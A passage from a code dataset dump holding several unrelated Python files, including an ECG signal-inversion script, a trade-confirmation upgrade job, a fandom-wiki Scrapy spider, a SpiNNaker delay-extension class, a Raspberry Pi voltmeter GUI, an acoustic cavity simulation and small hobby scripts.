max_sv) / len(\n samp_vals) * 100\n bottom = sum(1 for x in samp_vals if min_sv <= x <= mid_sv) / len(\n samp_vals) * 100\n\n ## If 75% or more of the data points are in the top half of the sample range, label guess- 'inverted'\n ## If data points are in bottom half of the range, label guess- 'normal'\n ## Everything else is labeled- 'unknown', then restart sample selection\n if top >= 75:\n inv_guesses.append('inv')\n elif bottom >= 75:\n inv_guesses.append('norm')\n else:\n inv_guesses.append('unk')\n samp_start = None\n\n ## For the list of guesses, find highest occurrence & probability\n if len(inv_guesses) > 0:\n guess = max(inv_guesses, key=inv_guesses.count)\n guess_perc = round(inv_guesses.count(guess) / len(inv_guesses) * 100, 2)\n\n ## If best guess is 'inverted' and probability is higher than 60%, call negdata_flip to invert signal\n if guess == 'inv' and guess_perc > 60:\n print(' Inverted signal detected')\n print(' Un-inverting data')\n lst[:] = negdata_flip(lst)\n\n return lst\n\n \n\n## Inverts any raw negative mV peaks data to positive, normal ECG\ndef negdata_flip(data_section):\n ## HeartPy Defaults: enhance_peaks = F, keep_range = T\n enhance_peaks = False\n keep_range = True\n out_array = flip_signal(data_section, enhance_peaks, keep_range)\n\n return out_array\n\n\n \n## Provides user option to save or print processed data locally\ndef print_dict(dictionary, outfile):\n ## Write the header\n header = []\n for key in dictionary:\n header.append(key)\n outfile.write(\", \".join(header) + '\\n')\n\n ## Write data set values\n print_line = []\n for key, items in dictionary.items():\n for i in range(len(dictionary[key])):\n for k in range(len(dictionary)):\n print_line.append(str(dictionary[list(dictionary)[k]][i]))\n outfile.write(\", \".join(print_line) + '\\n')\n print_line.clear()\n\n\n \n## Program begins\nif __name__ == '__main__':\n\n ## Ask user for data set or file name\n dataset = input('HRVY Begin\\nEnter the name of the data set or the file name: ')\n\n ## Call file opener\n contents = file_opener(dataset)\n\n if contents != 'end':\n ## If file present, then unpack tuple\n (hdr, csv) = contents\n\n ## Call hdr_data- dictionary builder & node info\n hdr_info = hdr_data(hdr)\n (hdr_dat, nodes_not_2ms) = hdr_info\n\n ## Call dat_file generation\n dat_align = align_plus_dat(hdr_dat, csv)\n (align_cont, file_dat) = dat_align\n\n ## Call alignment checker & outfile writer\n final_dat = time_out(csv, file_dat, nodes_not_2ms, align_cont)\n\n ## Call printing options\n plot_out(final_dat, dataset)\n\n else:\n print(\"Please try again\")\n\n print('HRVY complete')\n","sub_path":"hrvy_v1.py","file_name":"hrvy_v1.py","file_ext":"py","file_size_in_byte":25351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"207045943","text":"\"\"\" Compiled: 2020-09-18 10:38:49 \"\"\"\n\n#__src_file__ = \"extensions/confirmation/etc/upgrade/FConfirmationUpgradeMain.py\"\nimport acm\nimport FConfirmationUpgradeDeleteEvent\nimport FConfirmationUpgradeDeprecatedEvents\n\nfrom FOperationsUtils import Log\nfrom FConfirmationHelperFunctions import FConfirmationHelperFunctions as HelperFunctions\nfrom FConfirmationChecksum import CreateChecksum\n\nael_variables = []\n\ndef upgrade_start(parameterDictionary):\n UpgradeChecksum()\n SetExpiryDay()\n FConfirmationUpgradeDeprecatedEvents.UpgradeDeprecatedConfirmations()\n FConfirmationUpgradeDeleteEvent.DeleteDeprecatedEvents()\n\ndef ael_main(parameterDictionary):\n Log(True, 'Confirmation 
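# The inversion vote above, condensed into a standalone form: each clean
# sample window is classified by how much of it sits in the top or bottom
# half of the window's own range, and the majority label across windows
# decides whether the trace gets flipped. The thresholds (75% per window,
# >60% overall) come from the script; the two windows below are invented.
def window_vote(samples):
    hi, lo = max(samples), min(samples)
    mid = (hi + lo) / 2
    top = sum(1 for x in samples if mid <= x <= hi) / len(samples) * 100
    bottom = sum(1 for x in samples if lo <= x <= mid) / len(samples) * 100
    if top >= 75:
        return 'inv'
    if bottom >= 75:
        return 'norm'
    return 'unk'

votes = [window_vote(w) for w in ([0.9, 0.8, 0.85, 0.1], [0.95, 0.9, 0.8, 0.2])]
best = max(votes, key=votes.count)
print(best, votes.count(best) / len(votes) * 100)  # 'inv' at 100% -> flip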
upgrade commenced ...')\n upgrade_start(parameterDictionary)\n Log(True, 'Confirmation upgrade completed ...')\n\ndef UpgradeChecksum():\n confirmations = acm.FConfirmation.Select('')\n counter = 0\n\n Log(True, 'Setting check sum on confirmations ...')\n for confirmation in confirmations:\n if confirmation.IsPostRelease():\n confirmation.Checksum(CreateChecksum(confirmation))\n try:\n confirmation.Commit()\n counter += 1\n if (counter % 1000 == 0):\n Log(True, '%d confirmations updated, please wait ...' % counter)\n except Exception as error:\n Log(True, 'Error when upgrading confirmation %d: %s' % (confirmation.Oid(), error))\n\n Log(True, 'Check sum update completed. %d confirmations updated' % counter)\n\ndef SetExpiryDay():\n confirmations = acm.FConfirmation.Select('')\n counter = 0\n calendar = HelperFunctions.GetDefaultCalendar()\n Log(True, 'Setting expiry day on confirmations ...')\n\n for confirmation in confirmations:\n createTime = acm.Time.DateFromTime(confirmation.CreateTime())\n expiryDay = calendar.AdjustBankingDays(createTime, 10)\n confirmation.ExpiryDay(expiryDay)\n try:\n confirmation.Commit()\n counter += 1\n if (counter % 1000 == 0):\n Log(True, '%d confirmations updated, please wait ...' % counter)\n except Exception as error:\n Log(True, 'Error when upgrading confirmation %d: %s' % (confirmation.Oid(), error))\n\n Log(True, 'Expiry day update completed. %d confirmations updated' % counter)\n\n","sub_path":"Extensions/Default/FPythonCode/FConfirmationUpgradeMain.py","file_name":"FConfirmationUpgradeMain.py","file_ext":"py","file_size_in_byte":2339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"163326743","text":"import scrapy\nimport string\n\n\nclass OnepieceSpider(scrapy.Spider):\n name = 'char_info'\n allowed_domains = ['onepiece.fandom.com']\n\n def start_requests(self):\n urls = ['https://onepiece.fandom.com/wiki/List_of_Canon_Characters']\n for url in urls:\n yield scrapy.Request(url, self.extract_links)\n\n def extract_links(self, response):\n characters = response.xpath(\n \"//h2[1]//following::table[position()<3]//tbody/tr/td[2]/a/@href\").getall()\n for character in characters:\n yield response.follow(character, callback=self.extract_info)\n\n def extract_info(self, response):\n character = response.xpath(\n \"//aside//*[contains(@class,'pi-item pi-item-spacing pi-title')]/text()\").get()\n sections = response.xpath(\n \"//aside/*[contains(@class, 'pi-item pi-group')]\")\n section_data = {}\n for section in sections:\n\n section_name = section.xpath(\"descendant::h2/text()\").get()\n data_items = section.xpath(\"descendant::div[contains(@class, 'pi-item pi-data')]\")\n if len(data_items) > 0: \n data_labels = []\n data_values = []\n for item in data_items:\n data_labels.append(item.xpath(\"descendant::*[contains(@class, 'pi-data-label')]/text()\").get())\n data_values.append(item.xpath(\"descendant::*[contains(@class, 'pi-data-value')]//text()\").getall())\n section_items = dict(zip([label.translate(str.maketrans('', '', string.punctuation)) for label in data_labels], [''.join(value) for value in data_values])) \n section_data[section_name] = section_items\n yield {character: section_data}\n","sub_path":"one_piece_character_data_scraper/spiders/char_info.py","file_name":"char_info.py","file_ext":"py","file_size_in_byte":1746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"397653397","text":"\nfrom spynnaker.pyNN.utilities import 
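# The infobox parsing in the char_info spider above, reduced to the core
# trick: strip punctuation from each label, join each value's text
# fragments, and zip the two lists into one dict. The sample labels and
# values are invented stand-ins for scraped XPath results.
import string

labels = ['Japanese Name:', 'Age;']
values = [['Monkey D. Luffy'], ['17', ' (debut)']]

section_items = dict(zip(
    [label.translate(str.maketrans('', '', string.punctuation)) for label in labels],
    [''.join(value) for value in values],
))
print(section_items)  # {'Japanese Name': 'Monkey D. Luffy', 'Age': '17 (debut)'}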
constants\nfrom spynnaker.pyNN.models.utility_models.delay_block import DelayBlock\nfrom spynnaker.pyNN.models.utility_models.delay_extension_partitioned_vertex \\\n import DelayExtensionPartitionedVertex\n\nfrom spinn_front_end_common.abstract_models.\\\n abstract_provides_outgoing_partition_constraints import \\\n AbstractProvidesOutgoingPartitionConstraints\nfrom spinn_front_end_common.utilities import constants as common_constants\nfrom spinn_front_end_common.abstract_models\\\n .abstract_provides_n_keys_for_partition \\\n import AbstractProvidesNKeysForPartition\nfrom spinn_front_end_common.abstract_models.abstract_data_specable_vertex \\\n import AbstractDataSpecableVertex\n\nfrom pacman.model.constraints.partitioner_constraints.\\\n partitioner_same_size_as_vertex_constraint \\\n import PartitionerSameSizeAsVertexConstraint\nfrom pacman.model.constraints.key_allocator_constraints\\\n .key_allocator_contiguous_range_constraint \\\n import KeyAllocatorContiguousRangeContraint\nfrom pacman.model.partitionable_graph.abstract_partitionable_vertex \\\n import AbstractPartitionableVertex\n\nfrom data_specification.data_specification_generator\\\n import DataSpecificationGenerator\n\nimport logging\nimport math\n\nlogger = logging.getLogger(__name__)\n\n_DELAY_PARAM_HEADER_WORDS = 5\n\n\nclass DelayExtensionVertex(\n AbstractPartitionableVertex,\n AbstractDataSpecableVertex,\n AbstractProvidesOutgoingPartitionConstraints,\n AbstractProvidesNKeysForPartition):\n \"\"\" Provide delays to incoming spikes in multiples of the maximum delays\\\n of a neuron (typically 16 or 32)\n \"\"\"\n\n _DEFAULT_MALLOCS_USED = 2\n\n def __init__(self, n_neurons, delay_per_stage, source_vertex,\n machine_time_step, timescale_factor, constraints=None,\n label=\"DelayExtension\"):\n \"\"\"\n Creates a new DelayExtension Object.\n \"\"\"\n AbstractPartitionableVertex.__init__(\n self, n_neurons, label, 256, constraints)\n AbstractDataSpecableVertex.__init__(\n self, machine_time_step=machine_time_step,\n timescale_factor=timescale_factor)\n AbstractProvidesOutgoingPartitionConstraints.__init__(self)\n AbstractProvidesNKeysForPartition.__init__(self)\n\n self._source_vertex = source_vertex\n self._n_delay_stages = 0\n self._delay_per_stage = delay_per_stage\n\n # Dictionary of vertex_slice -> delay block for data specification\n self._delay_blocks = dict()\n\n self.add_constraint(\n PartitionerSameSizeAsVertexConstraint(source_vertex))\n\n def create_subvertex(\n self, vertex_slice, resources_required, label=None,\n constraints=None):\n return DelayExtensionPartitionedVertex(\n resources_required, label, constraints)\n\n @property\n def model_name(self):\n return \"DelayExtension\"\n\n @property\n def n_delay_stages(self):\n \"\"\" The maximum number of delay stages required by any connection\n out of this delay extension vertex\n \"\"\"\n return self._n_delay_stages\n\n @n_delay_stages.setter\n def n_delay_stages(self, n_delay_stages):\n self._n_delay_stages = n_delay_stages\n\n @property\n def source_vertex(self):\n return self._source_vertex\n\n def add_delays(self, vertex_slice, source_ids, stages):\n \"\"\" Add delayed connections for a given vertex slice\n \"\"\"\n key = (vertex_slice.lo_atom, vertex_slice.hi_atom)\n if key not in self._delay_blocks:\n self._delay_blocks[key] = DelayBlock(\n self._n_delay_stages, self._delay_per_stage, vertex_slice)\n [self._delay_blocks[key].add_delay(source_id, stage)\n for (source_id, stage) in zip(source_ids, stages)]\n\n def generate_data_spec(\n self, subvertex, 
placement, partitioned_graph, graph, routing_info,\n hostname, graph_mapper, report_folder, ip_tags, reverse_ip_tags,\n write_text_specs, application_run_time_folder):\n data_writer, report_writer = \\\n self.get_data_spec_file_writers(\n placement.x, placement.y, placement.p, hostname, report_folder,\n write_text_specs, application_run_time_folder)\n\n spec = DataSpecificationGenerator(data_writer, report_writer)\n\n # Reserve memory:\n spec.comment(\"\\nReserving memory space for data regions:\\n\\n\")\n\n # ###################################################################\n # Reserve SDRAM space for memory areas:\n vertex_slice = graph_mapper.get_subvertex_slice(subvertex)\n n_words_per_stage = int(math.ceil(vertex_slice.n_atoms / 32.0))\n delay_params_sz = 4 * (_DELAY_PARAM_HEADER_WORDS +\n (self._n_delay_stages * n_words_per_stage))\n\n spec.reserve_memory_region(\n region=(\n DelayExtensionPartitionedVertex.\n _DELAY_EXTENSION_REGIONS.SYSTEM.value),\n size=common_constants.DATA_SPECABLE_BASIC_SETUP_INFO_N_WORDS * 4,\n label='setup')\n\n spec.reserve_memory_region(\n region=(\n DelayExtensionPartitionedVertex.\n _DELAY_EXTENSION_REGIONS.DELAY_PARAMS.value),\n size=delay_params_sz, label='delay_params')\n\n subvertex.reserve_provenance_data_region(spec)\n\n self.write_setup_info(spec)\n\n spec.comment(\"\\n*** Spec for Delay Extension Instance ***\\n\\n\")\n\n key = None\n partitions = partitioned_graph.\\\n outgoing_edges_partitions_from_vertex(subvertex)\n for partition in partitions.values():\n keys_and_masks = \\\n routing_info.get_keys_and_masks_from_partition(partition)\n\n # NOTE: using the first key assigned as the key. Should in future\n # get the list of keys and use one per neuron, to allow arbitrary\n # key and mask assignments\n key = keys_and_masks[0].key\n\n incoming_key = None\n incoming_mask = None\n incoming_edges = partitioned_graph.incoming_subedges_from_subvertex(\n subvertex)\n\n\n for incoming_edge in incoming_edges:\n incoming_slice = graph_mapper.get_subvertex_slice(\n incoming_edge.pre_subvertex)\n if (incoming_slice.lo_atom == vertex_slice.lo_atom and\n incoming_slice.hi_atom == vertex_slice.hi_atom):\n partition = partitioned_graph.get_partition_of_subedge(\n incoming_edge)\n keys_and_masks = \\\n routing_info.get_keys_and_masks_from_partition(partition)\n incoming_key = keys_and_masks[0].key\n incoming_mask = keys_and_masks[0].mask\n\n self.write_delay_parameters(\n spec, vertex_slice, key, incoming_key, incoming_mask)\n # End-of-Spec:\n spec.end_specification()\n data_writer.close()\n\n return data_writer.filename\n\n def write_setup_info(self, spec):\n\n # Write this to the system region (to be picked up by the simulation):\n self._write_basic_setup_info(\n spec,\n (DelayExtensionPartitionedVertex.\n _DELAY_EXTENSION_REGIONS.SYSTEM.value))\n\n def write_delay_parameters(\n self, spec, vertex_slice, key, incoming_key, incoming_mask):\n \"\"\" Generate Delay Parameter data\n \"\"\"\n\n # Write spec with commands to construct required delay region:\n spec.comment(\"\\nWriting Delay Parameters for {} Neurons:\\n\"\n .format(vertex_slice.n_atoms))\n\n # Set the focus to the memory region 2 (delay parameters):\n spec.switch_write_focus(\n region=(\n DelayExtensionPartitionedVertex.\n _DELAY_EXTENSION_REGIONS.DELAY_PARAMS.value))\n\n # Write header info to the memory region:\n # Write Key info for this core and the incoming key and mask:\n spec.write_value(data=key)\n spec.write_value(data=incoming_key)\n spec.write_value(data=incoming_mask)\n\n # Write the 
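# A back-of-envelope check of the delay-parameter region sizing above: the
# region stores one bit per atom per delay stage, packed into 32-bit words,
# behind a five-word header, all counted in bytes. The atom and stage
# counts below are an invented example.
import math

_DELAY_PARAM_HEADER_WORDS = 5

def delay_params_size(n_atoms, n_delay_stages):
    n_words_per_stage = int(math.ceil(n_atoms / 32.0))
    return 4 * (_DELAY_PARAM_HEADER_WORDS + n_delay_stages * n_words_per_stage)

print(delay_params_size(100, 8))  # 100 atoms -> 4 words/stage -> 148 bytes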
number of neurons in the block:\n spec.write_value(data=vertex_slice.n_atoms)\n\n # Write the number of blocks of delays:\n spec.write_value(data=self._n_delay_stages)\n\n # Write the actual delay blocks\n spec.write_array(array_values=self._delay_blocks[(\n vertex_slice.lo_atom, vertex_slice.hi_atom)].delay_block)\n\n # inherited from partitionable vertex\n def get_cpu_usage_for_atoms(self, vertex_slice, graph):\n n_atoms = (vertex_slice.hi_atom - vertex_slice.lo_atom) + 1\n return 128 * n_atoms\n\n def get_sdram_usage_for_atoms(self, vertex_slice, graph):\n size_of_mallocs = (\n self._DEFAULT_MALLOCS_USED *\n common_constants.SARK_PER_MALLOC_SDRAM_USAGE)\n return (\n size_of_mallocs +\n DelayExtensionPartitionedVertex.get_provenance_data_size(0))\n\n n_words_per_stage = int(math.ceil(vertex_slice.n_atoms / 32.0))\n return ((constants.BLOCK_INDEX_HEADER_WORDS * 4) +\n (_DELAY_PARAM_HEADER_WORDS * 4) +\n (n_words_per_stage * self._n_delay_stages * 4) +\n size_of_mallocs)\n\n def get_dtcm_usage_for_atoms(self, vertex_slice, graph):\n n_atoms = (vertex_slice.hi_atom - vertex_slice.lo_atom) + 1\n return (44 + (16 * 4)) * n_atoms\n\n def get_binary_file_name(self):\n return \"delay_extension.aplx\"\n\n def is_data_specable(self):\n return True\n\n def get_n_keys_for_partition(self, partition, graph_mapper):\n vertex_slice = graph_mapper.get_subvertex_slice(\n partition.edges[0].pre_subvertex)\n if self._n_delay_stages == 0:\n return 1\n return vertex_slice.n_atoms * self._n_delay_stages\n\n def get_outgoing_partition_constraints(self, partition, graph_mapper):\n return [KeyAllocatorContiguousRangeContraint()]\n","sub_path":"src/spinnaker_ros_lsm/venv/lib/python2.7/site-packages/spynnaker/pyNN/models/utility_models/delay_extension_vertex.py","file_name":"delay_extension_vertex.py","file_ext":"py","file_size_in_byte":10044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"338011364","text":"import os\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"2\"\n\nfrom model.attr_net import Attr_Net\nimport bin.attr_test_att as attr_test\n\n# configure\nmodel_data_path = '/hdd/lujunyu/dataset/meituan/'\nmodel_path = '/hdd/lujunyu/model/meituan/'\n\nconf = {\n 'train_data_path' : os.path.join(model_data_path, 'train.pkl'),\n 'dev_data_path' : os.path.join(model_data_path, 'dev.pkl'),\n 'testa_data_path' : os.path.join(model_data_path, 'testa.pkl'),\n 'domain_emb_path': os.path.join(model_data_path, 'emb4data.pkl'),\n 'fasttext_emb_path': os.path.join(model_data_path, 'fasttext_emb4data.pkl'),\n 'tencent_emb_path': os.path.join(model_data_path, 'tencent_emb4data.pkl'),\n\n \"attr_init_model\": '/hdd/lujunyu/model/meituan/D_HAN_MC/attr6/', #should be set for test\n\n \"rand_seed\": None,\n \"learning_rate\":3e-4,\n \"vocab_size\": 212307, #111695\n \"domain_emb_dim\": 100,\n \"tencent_emb_dim\": 200,\n \"fasttext_emb_dim\": 300,\n \"batch_size\": 10, #200 for test\n\n \"max_rev_len\": 30,\n \"max_sent_len\": 300,\n 'attribute_num': 20,\n 'attribute_prototype': 3,\n\n \"max_to_keep\": 1,\n \"num_scan_data\": 10,\n \"\": 0, #1455 for DSTC7, 28270 for DAM_source, #1 for douban data , 6 for advising\n\n \"rnn_layers\":3,\n \"sent_attention_layers\":2,\n \"doc_attention_layers\":2,\n \"rnn_dim\":300,\n\n \"drop_out\":False,\n 'batch_normalization':False,\n\n 'Model': 'D_HAN_MC'\n}\nconf.update({'save_path' : os.path.join(model_path, conf['Model'] + '/attr6/')})\nconf.update({'emb_dim' : conf['domain_emb_dim'] + 
conf['tencent_emb_dim']})\n\n\nif __name__ == '__main__':\n\n model = Attr_Net(conf)\n attr_test.test(conf, model)\n\n\n","sub_path":"test_attr.py","file_name":"test_attr.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"165924092","text":"#!/usr/bin/python\n\nimport spidev\nimport time\nimport os\nimport wx\n\nID_SETTINGS_MAXTIME = wx.NewId()\nID_SETTINGS_SAMPLE_RATE = wx.NewId()\n\nclass windowClass(wx.Frame):\n\n def __init__(self, *args, **kwargs):\n wx.Frame.__init__(self, None, -1, 'Voltmeter')\n\n self.maxTime = 10\n self.samplingRate = 250\n self.initSPI()\n self.initADC()\n self.basicWindow()\n\n def initSPI(self):\n self.spi = spidev.SpiDev()\n self.spi.open(0,0)\n\n def initADC(self):\n self.channel = 0\n self.volts_accum = 0\n self.num_reads = 0\n self.Running = False\n self.start_time = 0\n\n def ReadChannel(self, channel):\n adc = self.spi.xfer2([1,(8+channel)<<4,0])\n data = ((adc[1]&3) << 8) + adc[2]\n return data\n\n def ConvertVolts(self, data,places):\n #volts = (data * 3.3) / float(1023)\n volts = (data * 5.0) / float(1023)\n volts = round(volts,places)\n return volts\n\n def basicWindow(self):\n panel = wx.Panel(self)\n \n menuBar = wx.MenuBar()\n \n fileButton = wx.Menu()\n settingsButton = wx.Menu()\n \n exitItem = wx.MenuItem(fileButton, wx.ID_EXIT, 'Quit')\n fileButton.AppendItem(exitItem)\n\n self.maxTimeButton = wx.MenuItem(settingsButton, ID_SETTINGS_MAXTIME,\n 'Max Sampling Time')\n settingsButton.AppendItem(self.maxTimeButton)\n \n self.sampleRateButton = wx.MenuItem(settingsButton, ID_SETTINGS_SAMPLE_RATE,\n 'Sampling Rate')\n settingsButton.AppendItem(self.sampleRateButton)\n \n menuBar.Append(fileButton, 'File')\n menuBar.Append(settingsButton, 'Settings')\n self.SetMenuBar(menuBar)\n self.Bind(wx.EVT_MENU, self.Quit, exitItem)\n self.Bind(wx.EVT_MENU, self.SetMaxTime, self.maxTimeButton)\n self.Bind(wx.EVT_MENU, self.SetSampleRate, self.sampleRateButton)\n \n sizer = wx.FlexGridSizer(cols=3, hgap=15, vgap=5)\n\n label_volts = wx.StaticText(panel, label=\"Voltage\")\n sizer.Add(label_volts, 0, wx.ALIGN_CENTER | wx.ALIGN_CENTER_VERTICAL)\n label_avg = wx.StaticText(panel, label=\"Running Average\")\n sizer.Add(label_avg, 0, wx.ALIGN_CENTER | wx.ALIGN_CENTER_VERTICAL)\n label_elapse_time = wx.StaticText(panel, label=\"Elapse Time (sec)\")\n sizer.Add(label_elapse_time, 0, wx.ALIGN_CENTER | wx.ALIGN_CENTER_VERTICAL)\n \n self.volts = wx.StaticText(panel, label=\"0.000\")\n sizer.Add(self.volts, 0, wx.ALIGN_CENTER | wx.ALIGN_CENTER_VERTICAL)\n self.volts_avg = wx.StaticText(panel, label=\"0.000\")\n sizer.Add(self.volts_avg, 0, wx.ALIGN_CENTER | wx.ALIGN_CENTER_VERTICAL)\n self.elapse_time = wx.StaticText(panel, label=\"000\")\n sizer.Add(self.elapse_time, 0, wx.ALIGN_CENTER | wx.ALIGN_CENTER_VERTICAL)\n \n self.startButton = wx.Button(panel, -1, label=\"Start\")\n self.Bind(wx.EVT_BUTTON, self.StartStop, self.startButton)\n sizer.Add(self.startButton, 0, wx.ALIGN_CENTER | wx.ALIGN_CENTER_VERTICAL)\n self.startButton.SetBackgroundColour('lightgreen')\n \n panel.SetSizer(sizer)\n sizer.Fit(self)\n sizer.SetSizeHints(self)\n \n self.Show(True)\n\n self.heartbeat()\n \n def StartStop(self, event):\n if self.Running == True:\n #Was already running, need to stop,\n # update button label to \"Start\"\n self.Running = False\n self.startButton.SetLabel(\"Start\")\n self.startButton.SetBackgroundColour('lightgreen')\n else:\n #Was stopped.\n # 1) update button to 
\"Stop\"\n # 2) clear vars\n # 3) store start time\n # 4) start\n self.initADC()\n self.startButton.SetLabel(\"Stop\")\n self.startButton.SetBackgroundColour('red')\n self.Running = True\n self.start_time = time.time()\n self.heartbeat()\n \n \n def Quit(self, e):\n self.Close()\n\n def updateVoltDisplay(self):\n level = self.ReadChannel(self.channel)\n voltage = self.ConvertVolts(level,4)\n self.volts.SetLabel('%0.4f' % voltage)\n self.num_reads += 1\n self.volts_accum += voltage\n volts_avg = self.volts_accum / self.num_reads\n self.volts_avg.SetLabel('%0.4f' % volts_avg)\n elapsed_time = time.time() - self.start_time\n self.elapse_time.SetLabel('%3i' % elapsed_time)\n if elapsed_time >= self.maxTime:\n self.StartStop(None)\n\n def heartbeat(self):\n if self.Running == True:\n self.updateVoltDisplay()\n wx.CallLater(self.samplingRate, self.heartbeat)\n\n def SetMaxTime(self, event):\n maxTimeBox = wx.TextEntryDialog(None, 'Enter maximum time in seconds.',\n 'Max Sampling Time', str(self.maxTime))\n if maxTimeBox.ShowModal() == wx.ID_OK:\n mTime = maxTimeBox.GetValue()\n try:\n stripped = str(int(mTime))\n self.maxTime = int(mTime)\n except:\n return\n\n def SetSampleRate(self, event):\n samplingRateBox = wx.TextEntryDialog(None, 'Enter sampling rate time in msecs. (200-1000)',\n 'Sampling Rate', str(self.samplingRate))\n if samplingRateBox.ShowModal() == wx.ID_OK:\n sRate = samplingRateBox.GetValue()\n try:\n stripped = str(int(sRate))\n if int(sRate) >= 250 and int(sRate) <= 1000:\n self.samplingRate = int(sRate)\n except:\n return\n\n\n\n\n\n\ndef main():\n app = wx.App()\n windowClass(None)\n\n app.MainLoop()\n\nmain()\n","sub_path":"wxVoltageDisplay.py","file_name":"wxVoltageDisplay.py","file_ext":"py","file_size_in_byte":5867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"287018852","text":"import numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport scipy.special as sp\nfrom tqdm import tqdm\n\nmpl.rcParams['pcolor.shading'] = 'auto'\nfont = {'family': 'serif',\n 'weight': 'regular',\n 'size': 12}\nmpl.rc('font', **font)\n\nfig, axs = plt.subplots(\n 1, 4,\n subplot_kw={'projection': 'polar'},\n tight_layout=True,\n figsize=(7.1, 5)\n)\n\ndef kronecker(i, j):\n return 1 if i == j else 0\n\npts = 100\nR = 1\nM = 2; N = 2 # modes to observe in the cavity\nradius = np.linspace(0, R, pts)\ntheta = np.linspace(0, 2 * np.pi, pts)\nRR, TT = np.meshgrid(radius, theta)\n\ndef amps(m, n, pos, om, q0):\n r0, a0 = pos\n dm0 = kronecker(m, 0)\n kmn = sp.jnp_zeros(m, n + 1)[-1] / R \n qstar = om * q0\n \n bst = sp.jv(m, kmn * r0) / sp.jv(m, kmn * R)**2\n #print(bst, kmn)\n amn = (2 * qstar * r0 * np.cos(m * a0) * kmn**2) \\\n / ((1 + dm0) * np.pi * (k**2 - kmn**2) * ((kmn * R)**2 - m**2)) * bst\n bmn = (2 * qstar * r0 * np.sin(m * a0) * kmn**2) \\\n / ((1 - dm0) * np.pi * (k**2 - kmn**2) * ((kmn * R)**2 - m**2)) * bst\n return amn, bmn, kmn\n\ndef pressure_field(t, om, q0, pos, phi):\n prt = np.zeros((pts, pts), dtype=complex)\n for m in range(1, M + 1):\n for n in range(0, N + 1):\n amn, bmn, kmn = amps(m, n, pos, om, q0)\n p_given_mode = (amn * np.cos(m * TT) + bmn * np.sin(m * TT)) * sp.jv(m, kmn * RR)\n prt += p_given_mode \n return prt * np.exp(1j * (om * t - phi))\n\nq0 = 1e-3\nc0 = 343\nk_cav = (sp.jnp_zeros(M, N + 1)[-1] / R)# + 150\nprint(k_cav)\nk = k_cav + 0.00001\nom = k * c0\nprint(om / 2 * np.pi)\n\nrr = 0.5\nnb_source = 25\n\nfor t, ax in zip([2e-4, 5e-4, 7e-4, 9e-4], axs.flat):\n prt = 
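# A hardware-free sketch of the MCP3008-style decode behind ReadChannel and
# ConvertVolts above: the SPI transfer returns three bytes, the low two
# bits of byte 1 plus all of byte 2 form a 10-bit sample, and the sample is
# scaled against the 5.0 V reference. The reply bytes below are invented.
def decode_adc(reply, vref=5.0, places=4):
    data = ((reply[1] & 3) << 8) + reply[2]  # 10-bit raw value, 0..1023
    return round(data * vref / 1023.0, places)

print(decode_adc([0, 2, 255]))  # raw 767 -> 3.7488 V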
np.zeros((pts, pts), dtype=complex)\n for n in range(nb_source):\n pos = (rr, (2 * n * np.pi / nb_source))\n ax.plot(pos[1], pos[0], 'ko', mfc='none')\n p = pressure_field(t, om, q0, pos, 2 * n * np.pi / nb_source)\n prt += p\n\n oui = ax.pcolormesh(TT, RR, prt.real, cmap='RdBu_r')\n # fig.colorbar(oui, ax=ax)\n ax.set_title(\"t = {:.4f} s\".format(t))\n ax.set_rticks([0, R/4, R/2, 3*R/4, R])\n # ax.set_rlabel_position(-np.pi/2)\n ax.set_xticks(np.pi/180. * np.arange(45, 316, 90))\n ax.set_theta_direction(-1)\n ax.set_theta_zero_location(\"N\") # Zero on top (north)\n #ax.grid(True) \n\nplt.show()","sub_path":"simulations/2dcase_timeev.py","file_name":"2dcase_timeev.py","file_ext":"py","file_size_in_byte":2366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"635018887","text":"# -*- coding: utf-8 -*-\nimport sys\nimport numpy as np\nimport pandas as pd\n\n'''\nAramaki-text.csv を処理する\n'''\n\n''' parameters '''\ninpath = sys.argv[1]\nword = '桜島'\noutpath = './{0}/{0}_frequency_{1}'.format(word, sys.argv[1])\n\n''' データ読み込み '''\ndf = pd.read_csv(inpath, header=None, error_bad_lines=False)\n\n''' データ前処理 '''\ndf.columns = ['time', 'tweet']\ndf = df.set_index('time')\ndf.index = pd.to_datetime(df.index, errors='coerce')\ndf = df.dropna() # 欠損値除去\n\n''' word を含むツイートを抽出 '''\ndf = df[df['tweet'].str.contains(word)]\ndf['counter'] = np.ones(df.shape[0])\n\n''' save '''\nresult = df.resample('D').sum()\nresult.to_csv(outpath)\n","sub_path":"Scripts/analize_aramaki-csv.py","file_name":"analize_aramaki-csv.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"610688428","text":"#Pedro Gallino\n#9/18/17\n#coloredSquare.py - makes a random number\n\nfrom ggame import *\nfrom random import randint\n\nnum = randint(1,6)\n\nif num == 1:\n red = Color(0xff0000,1)\n line = LineStyle(3,red)\n rectangle = RectangleAsset(100,100,line,red)\nelif num == 2:\n blue = Color(0x000ff,1)\n line = LineStyle(3,blue)\n rectangle = RectangleAsset(100,100,line,blue)\nelif num == 3:\n yellow = Color(0xffff00,1)\n line = LineStyle(3,yellow)\n rectangle = RectangleAsset(100,100,line,yellow)\nelif num == 4:\n purpel = Color(0xff33ff,1)\n line = LineStyle(3,purpel)\n rectangle = RectangleAsset(100,100,line,purpel)\nelif num == 5:\n green = Color(0x66cc00,1)\n line = LineStyle(3,green)\n rectangle = RectangleAsset(100,100,line,green)\nelif num == 6:\n orange = Color(0xff8000,1)\n line = LineStyle(3,orange)\n rectangle = RectangleAsset(100,100,line,orange)\n\nSprite(rectangle)\nmyApp = 